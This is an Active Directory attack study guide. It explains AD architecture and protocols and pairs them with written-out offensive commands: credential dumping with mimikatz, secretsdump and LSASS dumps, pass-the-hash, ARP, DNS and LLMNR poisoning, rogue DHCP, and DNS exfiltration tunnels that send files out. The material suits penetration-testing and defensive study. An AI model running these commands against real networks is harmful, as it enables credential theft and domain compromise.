Attacking Active Directory (AD)

Overview

This comprehensive guide covers Active Directory architecture, enumeration, and attack techniques. Understanding these concepts is essential for both offensive security assessments and defensive operations.

---

Learning Workflow

Phase 1: Foundations — AD architecture, domains, forests, trusts Phase 2: Objects — Users, groups, computers, services Phase 3: Infrastructure — Database, address resolution, protocols Phase 4: Authentication — NTLM, Kerberos, delegation Phase 5: Authorisation — ACLs, privileges, Group Policy

---

What is Active Directory?

Active Directory (AD) is Microsoft's directory service for Windows domain networks. It stores information about network objects (users, computers, groups, services) and provides authentication and authorisation services.

Core Components:

• Directory Service (AD DS): Stores and manages objects

• Authentication: Validates user/computer identity (Kerberos, NTLM)

• Authorisation: Determines access rights (ACLs, Group Policy)

• Replication: Synchronises data across Domain Controllers

• DNS Integration: Name resolution for AD services

Why Attackers Target AD:

• Centralised authentication = single point of compromise

• Credential caching enables lateral movement

• Trust relationships extend the attack surface

• Misconfigurations are common and exploitable

• Domain Admin = complete network control

---

Domains

A domain is the core administrative unit in Active Directory—a logical grouping of objects (users, computers, groups) that share a common directory database, security policies, and trust relationships.

Domain Name

Domains have two naming conventions:

Type	Example	Usage
DNS Name	corp.contoso.com	Network communication, Kerberos
NetBIOS Name	CORP	Legacy compatibility, NTLM

# Get current domain info
Get-ADDomain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Get domain SID
(Get-ADDomain).DomainSID

# Get domain controllers
Get-ADDomainController -Filter *

Domain Components:

• Domain Controllers (DCs): Host AD DS, handle authentication

• Member Servers: Domain-joined but don't run AD DS

• Workstations: Domain-joined client computers

• Organisational Units (OUs): Containers for organising objects

---

Forests

A forest is the top-level container in AD—a collection of one or more domains that share a standard schema, configuration, and Global Catalogue—all domains in a forest trust each other (transitive trust).

Forest: contoso.com
├── Domain: contoso.com (forest root domain)
├── Domain: corp.contoso.com (child domain)
├── Domain: eu.contoso.com (child domain)
└── Domain: partner.local (tree root - different namespace)

Forest Components:

• Schema: Defines object classes and attributes (forest-wide)

• Configuration: Forest topology, sites, services

• Global Catalogue: Partial replica of all domain objects

• Forest Root Domain: First domain created, contains Enterprise Admins

Functional Modes

Functional levels determine which AD features are available and which DC versions are supported.

Forest Functional Levels

Level	Minimum DC OS	Key Features
Windows 2000	Windows 2000	Basic AD
Windows 2003	Windows Server 2003	Forest trusts, linked-value replication
Windows 2008	Windows Server 2008	DFS-R for SYSVOL
Windows 2008 R2	Windows Server 2008 R2	AD Recycle Bin
Windows 2012	Windows Server 2012	-
Windows 2012 R2	Windows Server 2012 R2	Authentication policies
Windows 2016	Windows Server 2016	Privileged Access Management

Domain Functional Levels

Level	Key Features
Windows 2000 Native	Universal groups, group nesting
Windows 2003	lastLogonTimestamp, constrained delegation
Windows 2008	AES Kerberos, fine-grained password policies
Windows 2008 R2	Authentication mechanism assurance
Windows 2012	KDC support for claims
Windows 2012 R2	Protected Users group, authentication policies
Windows 2016	Smart card required for interactive logon

# Check functional levels
(Get-ADForest).ForestMode
(Get-ADDomain).DomainMode

---

Trusts

Trusts enable users in one domain to access resources in another domain. They define authentication pathways between domains.

Trust Direction

Direction	Description	Authentication Flow
One-way incoming	Trusting domain trusts trusted domain	Users from trusted → access trusting
One-way outgoing	Trusted domain is trusted by trusting domain	Users from this domain → access other
Two-way	Bidirectional trust	Users can authenticate in either direction

Domain A ----trusts----> Domain B (One-way)
Users in B can access resources in A
A is the "trusting" domain
B is the "trusted" domain

Trust Transitivity

Type	Description
Transitive	Trust extends to other trusted domains (A trusts B, B trusts C → A trusts C)
Non-transitive	Trust limited to the two domains only

Trust Types

Trust Type	Direction	Transitivity	Description
Parent-Child	Two-way	Transitive	Automatic between parent and child domains
Tree-Root	Two-way	Transitive	Between forest root and new tree root
Shortcut	One/Two-way	Transitive	Optimize authentication in large forests
External	One/Two-way	Non-transitive	To external AD domain (non-forest)
Forest	One/Two-way	Transitive	Between forest root domains
Realm	One/Two-way	Transitive/Non	To non-Windows Kerberos realm

Trust Key

Trusts are secured with a shared secret (trust key) used to encrypt inter-realm TGTs.

• Stored as a trust account password in both domains

• Used to generate Kerberos keys for cross-domain tickets

• Compromising trust keys enables golden ticket attacks across domains

# Enumerate trusts
Get-ADTrust -Filter *
nltest /domain_trusts /all_trusts

# Get trust details
Get-ADTrust -Identity "partner.local" | Select-Object *

More on Trusts

Trust Enumeration for Attacks

# PowerView
Get-DomainTrust
Get-ForestTrust
Get-DomainTrustMapping

# BloodHound collection includes trust data
SharpHound.exe -c All

Trust Attack Paths

1. SID History Injection: Inject privileged SIDs from a trusted domain

2. Foreign Group Membership: Users from a trusted domain in privileged groups

3. Trust Key Extraction: DCSync/mimikatz to get trust account hash

4. Kerberos Ticket Forgery: Golden tickets with cross-domain SIDs

---

Users

User objects represent security principals that can authenticate to the domain.

User Properties

User Identifiers

Identifier	Description	Example
SID	Security Identifier (unique, permanent)	S-1-5-21-....-1104
sAMAccountName	Pre-Windows 2000 logon name	jsmith
userPrincipalName	UPN format	jsmith@corp.contoso.com
distinguishedName	LDAP path	CN=John Smith,OU=Users,DC=corp,DC=contoso,DC=com
objectGUID	Globally unique identifier	{GUID}
RID	Relative ID (last part of SID)	1104

# Get user identifiers
Get-ADUser -Identity jsmith -Properties *

# Find user by SID
Get-ADUser -Filter {SID -eq "S-1-5-21-....-1104"}

User Secrets

LM/NT Hashes

Hash Type	Description	Security
LM Hash	Legacy, DES-based, case-insensitive	Weak, disabled by default (Vista+)
NT Hash	MD4 hash of Unicode password	Better, still no salt

LM Hash: AAD3B435B51404EEAAD3B435B51404EE (empty/disabled)
NT Hash: 32ED87BDB5FDC5E9CBA88547376818D4
Format: LM:NT or :NT (NTLM hash)

Dumping Hashes:

# Mimikatz
sekurlsa::logonpasswords
lsadump::sam
lsadump::dcsync /user:Administrator

# Impacket
secretsdump.py domain/user:password@dc.domain.com

Kerberos Keys

Derived from user password + salt (domain + username):

Key Type	Encryption	Usage
AES256-CTS-HMAC-SHA1-96	AES 256-bit	Modern Kerberos
AES128-CTS-HMAC-SHA1-96	AES 128-bit	Modern Kerberos
RC4-HMAC (arcfour)	NT Hash	Legacy compatibility
DES-CBC-MD5	DES	Very old systems

# Dump Kerberos keys
mimikatz # lsadump::dcsync /user:krbtgt /domain:corp.contoso.com

UserAccountControl

Bitmask attribute controlling account behaviour.

Flag	Value	Description
ACCOUNTDISABLE	0x0002	Account disabled
LOCKOUT	0x0010	Account locked
PASSWD_NOTREQD	0x0020	No password required
PASSWD_CANT_CHANGE	0x0040	User can't change password
ENCRYPTED_TEXT_PWD_ALLOWED	0x0080	Reversible encryption
NORMAL_ACCOUNT	0x0200	Standard user account
DONT_EXPIRE_PASSWORD	0x10000	Password never expires
TRUSTED_FOR_DELEGATION	0x80000	Unconstrained delegation
NOT_DELEGATED	0x100000	Account cannot be delegated
USE_DES_KEY_ONLY	0x200000	DES encryption only
DONT_REQ_PREAUTH	0x400000	No Kerberos pre-auth (ASREProastable)
TRUSTED_TO_AUTH_FOR_DELEGATION	0x1000000	Constrained delegation (S4U2Self)

# Find accounts with specific UAC flags
# No pre-auth (ASREProastable)
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}

# Unconstrained delegation
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Password not required
Get-ADUser -Filter {PasswordNotRequired -eq $true}

Other User Properties

Property	Attack Relevance
servicePrincipalName	Kerberoastable if set
msDS-AllowedToDelegateTo	Constrained delegation targets
msDS-AllowedToActOnBehalfOfOtherIdentity	RBCD targets
adminCount	AdminSDHolder protected
memberOf	Group memberships
pwdLastSet	Password age
lastLogon	Activity indicator
logonCount	Activity indicator
description	Often contains passwords

Important Users

Built-in Privileged Users

Account	RID	Description
Administrator	500	Built-in domain admin
krbtgt	502	KDC service account (golden ticket target)
Guest	501	Disabled by default

Service Accounts to Target

Account Type	Characteristics	Attack
Service Accounts	SPNs, often weak passwords	Kerberoast
gMSA	Managed passwords	Harder to compromise
Computer Accounts	Machine account	Password in registry

# Find service accounts (accounts with SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Computer Accounts

Computer accounts are security principals for domain-joined machines.

Properties:

• Name ends with $ (e.g., WORKSTATION01$)

• Password: 120+ character random, auto-rotated every 30 days

• Stored in HKLM\SECURITY\Policy\Secrets$MACHINE.ACC

• SPN: HOST/computername, HOST/computername.domain.com

# Enumerate computer accounts
Get-ADComputer -Filter * -Properties *

# Find computers with unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# Find computers with constrained delegation
Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Trust Accounts

Each trust creates a trust account in both domains (named after the trusted domain with $).

# Find trust accounts
Get-ADUser -Filter {Name -like "*$"} -Properties * | Where-Object {$_.UserAccountControl -band 0x820}

---

Groups

Groups are collections of users, computers, or other groups used for access control and management.

Important Groups

Administrative Groups

Group	Scope	Description
Domain Admins	Global	Full control of domain
Enterprise Admins	Universal (forest root)	Full control of forest
Schema Admins	Universal (forest root)	Can modify AD schema
Administrators	Domain Local	Local admin on DCs
Account Operators	Domain Local	Create/manage users and groups
Backup Operators	Domain Local	Backup/restore files, DCSync potential
Server Operators	Domain Local	Manage domain servers
Print Operators	Domain Local	Manage printers, load drivers

Other Important Groups

Group	Description
Domain Controllers	All DCs in domain
Domain Computers	All workstations
Domain Users	All domain users
Protected Users	Enhanced credential protection
Group Policy Creator Owners	Create/modify GPOs
DnsAdmins	DNS management, code execution potential
Remote Desktop Users	RDP access
Remote Management Users	WinRM access
Cert Publishers	Certificate publishing
Exchange Windows Permissions	Often has WriteDacl on domain

# Enumerate group members
Get-ADGroupMember -Identity "Domain Admins" -Recursive

# Find nested group memberships
Get-ADPrincipalGroupMembership -Identity jsmith

# Find groups with specific privileges
Get-ADGroup -Filter * -Properties adminCount | Where-Object {$_.adminCount -eq 1}

Group Scope

Scope	Can Contain	Can Be Used In
Domain Local	Users/groups from any domain	Same domain only
Global	Users/groups from same domain	Any domain in forest
Universal	Users/groups from any domain	Any domain in forest

---

Computers

Domain Controllers

Domain Controllers (DCs) host Active Directory Domain Services and handle authentication requests.

Domain Controllers Discovery

# DNS queries
nslookup -type=srv _ldap._tcp.dc._msdcs.domain.com
nslookup -type=srv _kerberos._tcp.domain.com

# LDAP query
ldapsearch -x -H ldap://dc.domain.com -b "dc=domain,dc=com" "(objectClass=computer)" | grep -i "dn:"

# PowerShell
Get-ADDomainController -Filter *
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers

# Nmap
nmap -p 389,636,88,53 192.168.1.0/24

# NetBIOS
nbtscan 192.168.1.0/24

Domain Database Dumping

The AD database (NTDS.dit) contains all domain secrets.

# DCSync (requires Replicating Directory Changes)
mimikatz # lsadump::dcsync /domain:corp.contoso.com /all /csv
secretsdump.py domain/user:password@dc.domain.com

# Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

# ntdsutil
ntdsutil "activate instance ntds" "ifm" "create full C:\temp" quit quit

# Extract hashes offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Windows Computers

Windows Computers Discovery

# Network scanning
nmap -sn 192.168.1.0/24
nmap -p 445,135,139 192.168.1.0/24 --open

# LDAP enumeration
Get-ADComputer -Filter {OperatingSystem -like "*Windows*"} -Properties OperatingSystem

# SMB enumeration
crackmapexec smb 192.168.1.0/24

# NetBIOS
nbtscan 192.168.1.0/24

# Ping sweep
fping -a -g 192.168.1.0/24

Windows Computers Connection

Connecting with RPC/SMB

# PsExec (ADMIN$ share + service creation)
psexec.py domain/user:password@target.domain.com
psexec.exe \\target -u domain\user -p password cmd.exe

# SMBExec (no file drop)
smbexec.py domain/user:password@target.domain.com

# WMIExec (WMI-based)
wmiexec.py domain/user:password@target.domain.com

# ATExec (scheduled task)
atexec.py domain/user:password@target.domain.com "command"

# DCOM Exec
dcomexec.py domain/user:password@target.domain.com

# Pass the hash
psexec.py -hashes :NTHASH domain/user@target.domain.com
crackmapexec smb target -u user -H NTHASH -d domain -x "whoami"

Connecting with PowerShell Remoting

# Enable remoting
Enable-PSRemoting -Force

# Interactive session
Enter-PSSession -ComputerName target.domain.com -Credential domain\user

# Remote command execution
Invoke-Command -ComputerName target.domain.com -ScriptBlock {whoami} -Credential domain\user

# Session-based
$session = New-PSSession -ComputerName target.domain.com -Credential domain\user
Invoke-Command -Session $session -ScriptBlock {whoami}
Enter-PSSession -Session $session

# Evil-WinRM
evil-winrm -i target.domain.com -u user -p password -d domain

# With hash
evil-winrm -i target.domain.com -u user -H NTHASH

Connecting with RDP

# Linux
xfreerdp /u:user /p:password /d:domain /v:target.domain.com
rdesktop -u user -p password -d domain target.domain.com

# With hash (Restricted Admin mode required)
xfreerdp /u:user /pth:NTHASH /d:domain /v:target.domain.com

# Windows
mstsc /v:target.domain.com

Windows Computers Credentials

LSASS Credentials

LSASS (Local Security Authority Subsystem Service) caches credentials for SSO.

# Mimikatz
sekurlsa::logonpasswords    # All cached credentials
sekurlsa::wdigest           # WDigest plaintext (if enabled)
sekurlsa::kerberos          # Kerberos tickets
sekurlsa::msv               # NTLM hashes
sekurlsa::credman           # Credential Manager

# Dump LSASS memory
procdump.exe -ma lsass.exe lsass.dmp
comsvcs.dll method: rundll32 C:\Windows\System32\comsvcs.dll, MiniDump <lsass_pid> lsass.dmp full

# Process from dump
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

# pypykatz (Python)
pypykatz lsa minidump lsass.dmp

Registry Credentials

LSA Secrets

Stored in HKLM\SECURITY\Policy\Secrets:

• Service account passwords

• Auto-logon credentials

• Machine account password

• DPAPI master keys

# Mimikatz
lsadump::secrets

# Impacket
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

SAM

Local account hashes in HKLM\SAM:

# Mimikatz
lsadump::sam

# Impacket
secretsdump.py -sam SAM -system SYSTEM LOCAL

# Registry extraction
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

Dumping Registry Credentials

# Save registry hives
reg save HKLM\SAM C:\temp\sam
reg save HKLM\SYSTEM C:\temp\system
reg save HKLM\SECURITY C:\temp\security

# CrackMapExec
crackmapexec smb target -u user -p password --sam
crackmapexec smb target -u user -p password --lsa

PowerShell History

# PSReadLine history location
%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Get history
Get-Content (Get-PSReadLineOption).HistorySavePath

# Search for credentials
Select-String -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -Pattern "password|credential|secret"

Other Places to Find Credentials in Windows

Location	Content
%USERPROFILE%\AppData\Local\Microsoft\Credentials\	DPAPI-protected credentials
%USERPROFILE%\AppData\Roaming\Microsoft\Credentials\	DPAPI-protected credentials
C:\Windows\Panther\unattend.xml	Setup credentials
C:\Windows\Panther\Unattended.xml	Setup credentials
%WINDIR%\sysprep\sysprep.xml	Sysprep credentials
%WINDIR%\sysprep\sysprep.inf	Sysprep credentials
C:\inetpub\wwwroot\web.config	Web app credentials
%USERPROFILE%\.aws\credentials	AWS credentials
%USERPROFILE%\.azure\	Azure credentials
Group Policy Preferences	Encrypted (decryptable) passwords
Scheduled Tasks	Service account credentials
Windows Vault	Web credentials

# Find GPP passwords
findstr /SI /M "cpassword" \\domain.com\sysvol\domain.com\policies\*.xml

# Search for passwords in files
findstr /spin "password" *.txt *.xml *.ini *.config

# Credential Manager
cmdkey /list
vaultcmd /listcreds:"Windows Credentials" /all

Linux Computers

Linux Computers Discovery

# Network scanning
nmap -sn 192.168.1.0/24
nmap -p 22,111,2049 192.168.1.0/24 --open

# LDAP enumeration
ldapsearch -x -H ldap://dc.domain.com -b "dc=domain,dc=com" "(&(objectClass=computer)(operatingSystem=*Linux*))"

# From AD
Get-ADComputer -Filter {OperatingSystem -like "*Linux*"} -Properties OperatingSystem

Linux Computers Connection

# SSH with password
ssh user@target.domain.com

# SSH with key
ssh -i private_key user@target.domain.com

# SSH with Kerberos
kinit user@DOMAIN.COM
ssh -K user@target.domain.com

# SCP file transfer
scp file.txt user@target.domain.com:/tmp/

Linux Computers Credentials

Linux Kerberos Tickets

# Ticket cache location
echo $KRB5CCNAME
ls -la /tmp/krb5cc_*

# Default locations
/tmp/krb5cc_%{uid}
/var/lib/sss/db/

# Copy ticket for use
export KRB5CCNAME=/tmp/krb5cc_1000

# List tickets
klist

# Keytab locations
/etc/krb5.keytab
~/.k5keytab

# Extract keys from keytab
klist -k /etc/krb5.keytab

Linux User Files

# Password hashes
/etc/shadow

# User information
/etc/passwd

# Group information
/etc/group

# Crack shadow hashes
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john --wordlist=rockyou.txt unshadowed.txt
hashcat -m 1800 -a 0 shadow.txt rockyou.txt

SSH Keys

# Common locations
~/.ssh/id_rsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
~/.ssh/authorized_keys

# Search for keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Extract private keys
cat ~/.ssh/id_rsa

Bash History

# History files
~/.bash_history
~/.zsh_history
~/.history

# Search for credentials
grep -E "password|passwd|secret|key|token" ~/.bash_history
history | grep -i pass

Other Places to Find Credentials in Linux

Location	Content
/etc/sssd/sssd.conf	AD integration credentials
/etc/krb5.conf	Kerberos configuration
/etc/samba/smb.conf	Samba configuration
~/.pgpass	PostgreSQL credentials
~/.my.cnf	MySQL credentials
~/.netrc	FTP credentials
~/.aws/credentials	AWS credentials
/var/log/auth.log	Authentication attempts
/etc/openldap/ldap.conf	LDAP configuration
Environment variables	API keys, tokens

# Search for credentials in config files
grep -rli "password" /etc/ 2>/dev/null
grep -rli "password" /var/www/ 2>/dev/null
grep -rli "password" /opt/ 2>/dev/null

# Environment variables
env | grep -i pass
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i pass

---

Services

Host Service

The HOST SPN is an alias that includes multiple services:

Service	Description
alerter	Alerter service
appmgmt	Application Management
cisvc	Indexing Service
clipsrv	ClipBook
browser	Computer Browser
dhcp	DHCP Server
dnscache	DNS Client
replicator	Directory Replicator
eventlog	Event Log
eventsystem	COM+ Event System
policyagent	IPSec Policy Agent
oakley	ISAKMP/Oakley
dmserver	Logical Disk Manager
messenger	Messenger
netman	Network Connections
nla	Network Location Awareness
rpc	Remote Procedure Call
rpclocator	RPC Locator
remoteaccess	Routing and Remote Access
rsvp	RSVP QoS
samss	SAM
scardsvr	Smart Card
scesrv	Security Configuration
seclogon	Secondary Logon
scm	Service Control Manager
dcom	Server service (DCOM)
spooler	Print Spooler
snmp	SNMP Trap
schedule	Task Scheduler
tapisrv	Telephony
trksvr	Distributed Link Tracking Server
trkwks	Distributed Link Tracking Client
ntdsa	Active Directory
ups	UPS
time	Windows Time
wins	Windows Wins
www	IIS

# Enumerate SPNs
setspn -L computername
Get-ADComputer -Identity computername -Properties ServicePrincipalName | Select-Object -ExpandProperty ServicePrincipalName

---

Database

The Active Directory database (NTDS.dit) stores all domain objects using the Extensible Storage Engine (ESE).

Classes

Object classes define what type of object can be created and what attributes it can have.

Class	Description	Key Attributes
user	User accounts	sAMAccountName, userPrincipalName, unicodePwd
computer	Computer accounts	dNSHostName, operatingSystem
group	Security groups	member, groupType
organizationalUnit	Containers	gpLink
domainDNS	Domain object	objectSid, fSMORoleOwner
trustedDomain	Trust objects	trustDirection, trustType
groupPolicyContainer	GPOs	gPCFileSysPath

Properties

Attributes store object information. Key security-relevant attributes:

Attribute	Object	Description
unicodePwd	User	NT hash (encrypted)
ntPwdHistory	User	Password history
dBCSPwd	User	LM hash
supplementalCredentials	User	Kerberos keys
msDS-AllowedToDelegateTo	User/Computer	Constrained delegation
msDS-AllowedToActOnBehalfOfOtherIdentity	Computer	RBCD
userAccountControl	User/Computer	Account flags
servicePrincipalName	User/Computer	SPNs
nTSecurityDescriptor	All	Security descriptor (ACL)
adminCount	User/Group	Protected by AdminSDHolder

Principals

Security principals are objects that can be assigned permissions and authenticate.

SID

Security Identifier - unique identifier for principals.

S-1-5-21-3623811015-3361044348-30300820-1013
│ │ │  └──────────────────────────────────┴──── Domain Identifier
│ │ └─────────────────────────────────────────── Authority (5 = NT Authority)
│ └───────────────────────────────────────────── Revision (1)
└─────────────────────────────────────────────── SID indicator

Well-Known SIDs:

SID	Name
S-1-5-21-<domain>-500	Domain Administrator
S-1-5-21-<domain>-502	krbtgt
S-1-5-21-<domain>-512	Domain Admins
S-1-5-21-<domain>-513	Domain Users
S-1-5-21-<domain>-516	Domain Controllers
S-1-5-21-<domain>-519	Enterprise Admins
S-1-5-32-544	Administrators
S-1-5-32-545	Users
S-1-5-18	Local System
S-1-5-19	Local Service
S-1-5-20	Network Service

Distinguished Names

LDAP path to an object.

CN=John Smith,OU=Users,OU=Corp,DC=domain,DC=com
│             │        │       └─────────────── Domain Component
│             │        └───────────────────────── Organisational Unit
│             └────────────────────────────────── Organisational Unit
└──────────────────────────────────────────────── Common Name

Partitions

Partition	Description	Replication
Domain	Domain-specific objects	Domain DCs only
Configuration	Forest topology, sites	All DCs in forest
Schema	Object definitions	All DCs in forest
Application	Custom partitions (DNS zones)	Configurable

Global Catalog

Partial read-only replica of all objects in the forest (subset of attributes).

• Runs on port 3268 (LDAP) / 3269 (LDAPS)

• Used for forest-wide searches

• Used for UPN authentication

• Contains membership of universal groups

# Query Global Catalog
ldapsearch -x -H ldap://dc.domain.com:3268 -b "dc=domain,dc=com"

How to Query the Database?

LDAP

Lightweight Directory Access Protocol - primary method for AD queries.

Ports:

• 389: LDAP

• 636: LDAPS (SSL)

• 3268: Global Catalog

• 3269: Global Catalog SSL

# Anonymous bind (if allowed)
ldapsearch -x -H ldap://dc.domain.com -b "dc=domain,dc=com"

# Authenticated bind
ldapsearch -x -H ldap://dc.domain.com -D "CN=user,CN=Users,DC=domain,DC=com" -w password -b "dc=domain,dc=com"

# Find all users
ldapsearch -x -H ldap://dc.domain.com -D "user@domain.com" -w password -b "dc=domain,dc=com" "(objectClass=user)"

# Find specific user
ldapsearch -x -H ldap://dc.domain.com -D "user@domain.com" -w password -b "dc=domain,dc=com" "(sAMAccountName=jsmith)"

# Find computers
ldapsearch -x -H ldap://dc.domain.com -D "user@domain.com" -w password -b "dc=domain,dc=com" "(objectClass=computer)"

# Find groups
ldapsearch -x -H ldap://dc.domain.com -D "user@domain.com" -w password -b "dc=domain,dc=com" "(objectClass=group)"

# Find SPNs
ldapsearch -x -H ldap://dc.domain.com -D "user@domain.com" -w password -b "dc=domain,dc=com" "(servicePrincipalName=*)"

# PowerShell ADSI
$searcher = [adsisearcher]"(objectClass=user)"
$searcher.FindAll()

# Active Directory module
Get-ADUser -Filter * -Properties *
Get-ADComputer -Filter * -Properties *
Get-ADGroup -Filter * -Properties *

ADWS

Active Directory Web Services - SOAP-based interface (PowerShell remoting).

• Port 9389

• Used by Active Directory module for PowerShell

• Requires AD Web Services role

# Uses ADWS by default
Get-ADUser -Server dc.domain.com -Filter *

Other Protocols

Protocol	Port	Usage
Kerberos	88	Authentication, principal enumeration
DNS	53	SRV records, zone transfers
SMB	445	Share enumeration, file access
RPC	135	SAMR, DRSUAPI, LSARPC
NetBIOS	137-139	Legacy name resolution

# SAMR enumeration (user/group info)
rpcclient -U 'domain/user%password' dc.domain.com
rpcclient $> enumdomusers
rpcclient $> enumdomgroups

# SMB enumeration
smbclient -L //dc.domain.com -U 'domain/user%password'

---

Security

Active Directory security relies on multiple layers:

Layer	Components
Authentication	Kerberos, NTLM, certificates
Authorization	ACLs, privileges, Group Policy
Encryption	TLS/SSL, Kerberos encryption, LDAPS
Auditing	Security event logs, advanced audit policies
Tiering	Administrative tier model

---

Address Resolution

ARP

Address Resolution Protocol - maps IP addresses to MAC addresses on local networks.

ARP Spoof

Redirect traffic by sending fake ARP replies.

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Bettercap
bettercap -iface eth0
» net.probe on
» set arp.spoof.targets 192.168.1.100
» arp.spoof on

# Ettercap
ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//

# arpspoof
arpspoof -i eth0 -t 192.168.1.100 -r 192.168.1.1

ARP Scan

Discover hosts on local network.

# arp-scan
arp-scan -l
arp-scan 192.168.1.0/24

# Nmap
nmap -PR -sn 192.168.1.0/24

# Netdiscover
netdiscover -i eth0 -r 192.168.1.0/24

DHCP

Dynamic Host Configuration Protocol - assigns IP addresses and network configuration.

Rogue DHCP Server

Deploy malicious DHCP server to control client network configuration.

# Metasploit
use auxiliary/server/dhcp
set SRVHOST 192.168.1.50
set NETMASK 255.255.255.0
set ROUTER 192.168.1.50  # Point to attacker
set DNSSERVER 192.168.1.50  # Point to attacker
run

# Responder (includes rogue DHCP)
responder -I eth0 -d

DHCP Starvation

Exhaust DHCP pool to enable rogue server.

# DHCPig
pig.py eth0

# Yersinia
yersinia dhcp -attack 1

DHCP Discovery

Identify DHCP servers.

# Nmap
nmap -sU -p 67 --script=dhcp-discover 192.168.1.0/24

DHCP Dynamic DNS

DHCP can update DNS records (DDNS), potentially allowing DNS poisoning.

DNS

Domain Name System - critical for AD functionality.

DNS Basics

AD integrates DNS for service location:

Record Type	Purpose	Example
A	Host to IP	dc01.domain.com → 192.168.1.1
AAAA	Host to IPv6	dc01.domain.com → fe80::1
CNAME	Alias	mail.domain.com → exchange.domain.com
SRV	Service location	_ldap._tcp.domain.com
MX	Mail server	domain.com → mail.domain.com
PTR	IP to host	1.1.168.192.in-addr.arpa → dc01.domain.com
NS	Name server	domain.com → dc01.domain.com
SOA	Zone authority	Zone metadata

Critical AD SRV Records:

_ldap._tcp.dc._msdcs.<domain>     # Domain Controllers
_kerberos._tcp.<domain>            # Kerberos KDC
_gc._tcp.<forest>                  # Global Catalog
_kpasswd._tcp.<domain>             # Kerberos password change

DNS Zones

Zone Type	Description
Forward Lookup	Name to IP resolution
Reverse Lookup	IP to name resolution
AD-Integrated	Stored in AD, replicated automatically
Primary	Authoritative, read-write
Secondary	Copy of primary, read-only
Stub	Contains only NS records

DNS Exfiltration

Exfiltrate data through DNS queries.

# DNScat2
dnscat2-server domain.com

# Iodine (DNS tunnel)
iodined -f -c -P password 10.0.0.1 dns.domain.com

# DNSExfiltrator
python dnsexfil.py -d domain.com -f secret.txt

Fake DNS Server

Respond to DNS queries with malicious answers.

# Responder
responder -I eth0

# DNSChef
dnschef --interface 192.168.1.50 --fakeip 192.168.1.50

# Bettercap
bettercap -iface eth0
» set dns.spoof.domains target.com
» set dns.spoof.address 192.168.1.50
» dns.spoof on

DNS Zone Transfer

Request full copy of DNS zone.

# dig
dig axfr @dc.domain.com domain.com

# nslookup
nslookup
> server dc.domain.com
> set type=any
> ls -d domain.com

# dnsrecon
dnsrecon -d domain.com -t axfr

Dump DNS Records

Enumerate DNS records.

# DNS enumeration
dnsrecon -d domain.com -t std
dnsenum domain.com

# Fierce
fierce --domain domain.com

# From AD (if joined)
Get-DnsServerResourceRecord -ZoneName "domain.com" -ComputerName dc.domain.com

# LDAP query for AD-integrated zones
ldapsearch -x -H ldap://dc.domain.com -D "user@domain.com" -w password -b "DC=domain.com,CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com"

# adidnsdump
adidnsdump -u domain\\user -p password dc.domain.com

ADIDNS

Active Directory Integrated DNS - DNS zones stored in AD.

Attack vectors:

• Add DNS records (if user has permissions)

• Modify existing records

• Create wildcard records for LLMNR/NBT-NS style attacks

# Add DNS record (requires CreateChild on zone)
dnstool.py -u 'domain\user' -p 'password' --action add --record attacker --data 192.168.1.50 dc.domain.com

# Query ADIDNS via LDAP
ldapsearch -x -H ldap://dc.domain.com -D "user@domain.com" -w password -b "CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com"

DNS Dynamic Updates

DNS records can be updated dynamically.

# nsupdate
nsupdate -k Kkey.+157+00000.key
> server dc.domain.com
> update add malicious.domain.com 86400 A 192.168.1.50
> send

# PowerShell (if permitted)
Add-DnsServerResourceRecordA -Name "malicious" -ZoneName "domain.com" -IPv4Address "192.168.1.50"

NetBIOS

Legacy name resolution protocol.

NetBIOS Datagram Service

Port 138 UDP - broadcasts and datagram messaging.

NetBIOS Session Service

Port 139 TCP - session establishment for SMB (legacy).

NetBIOS Name Service

Port 137 UDP - name registration and resolution.

# NBT-NS enumeration
nbtscan 192.168.1.0/24

# nmblookup
nmblookup -A 192.168.1.1

# Nmap
nmap -sU -p 137 --script nbstat 192.168.1.0/24

# NetBIOS name poisoning
responder -I eth0

LLMNR

Link-Local Multicast Name Resolution - resolves names when DNS fails.

• Multicast to 224.0.0.252 (IPv4) / ff02::1:3 (IPv6)

• Port 5355 UDP

• No authentication - vulnerable to spoofing

# LLMNR poisoning
responder -I eth0

# Inveigh (PowerShell)
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y

mDNS

Multicast DNS - Apple Bonjour, zero-configuration networking.

• Multicast to 224.0.0.251 (IPv4) / ff02::fb (IPv6)

• Port 5353 UDP

• Used for .local domain

# mDNS poisoning
responder -I eth0

# Discover mDNS services
avahi-browse -a
dns-sd -B _services._dns-sd._udp

WPAD

Web Proxy Auto-Discovery - automatic proxy configuration.

Attack: Respond to WPAD queries with a malicious proxy.

# Responder (includes WPAD)
responder -I eth0 -wrf

# Custom WPAD server
# Serve wpad.dat that proxies through attacker

